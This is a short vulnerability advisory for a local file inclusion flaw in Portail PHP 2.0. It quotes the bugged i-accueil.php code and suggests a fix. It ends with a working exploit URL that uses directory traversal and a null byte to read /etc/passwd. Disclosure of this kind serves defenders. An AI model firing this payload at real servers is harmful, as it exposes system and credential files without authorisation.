Portail PHP 2.0 Local File Inclusion

`[START]  
  
#########################################################################################  
[0x01] Informations:  
  
Script : Portailphp 2.0  
Download : http://www.safari-msi.com/portailphp/mod_file/upload/PortailPHP-v2.0.zip  
Vulnerability : Local File Inclusion  
Author : Osirys  
Contact : osirys[at]live[dot]it  
Website : http://osirys.org  
Notes : Proud to be Italian  
Greets: : XaDoS, x0r, emgent, Jay, str0ke. Expecially to: AlpHaNiX  
  
#########################################################################################  
[0x02] Bug:[Local File Inclusion]  
######  
  
Bugged file is: /[path]/i-accueil.php  
  
[CODE]  
  
<?php  
/*  
PORTAILPHP  
*/  
echo "<table width='100%'><tr><td>";  
echo "<img border='0' src='themes/" . $_SESSION["App_Theme"] . "/ico-fleche01.gif' alt=''>  
&nbsp;Bienvenue sur <strong>$App_Me_Titre</strong><br /><br />" ;  
include("$chemin/mod_news/index.php");  
echo "</td></tr></table>";  
  
?>  
  
[/CODE]  
  
$chemin is not declared, so we can set its value from GET.  
  
[!] FIX: Just declare $chemin, or don't include it, becouse it's not necessary.   
i-accueil.php is in the / path, like /mod_news/index.php.  
Secure include: include("/mod_news/index.php");  
  
[!] EXPLOIT: /[path]/i-accueil.php?chemin=[local_file_to_include]  
../../../../../../../../../../../etc/passwd%00  
  
#########################################################################################  
  
[/END]`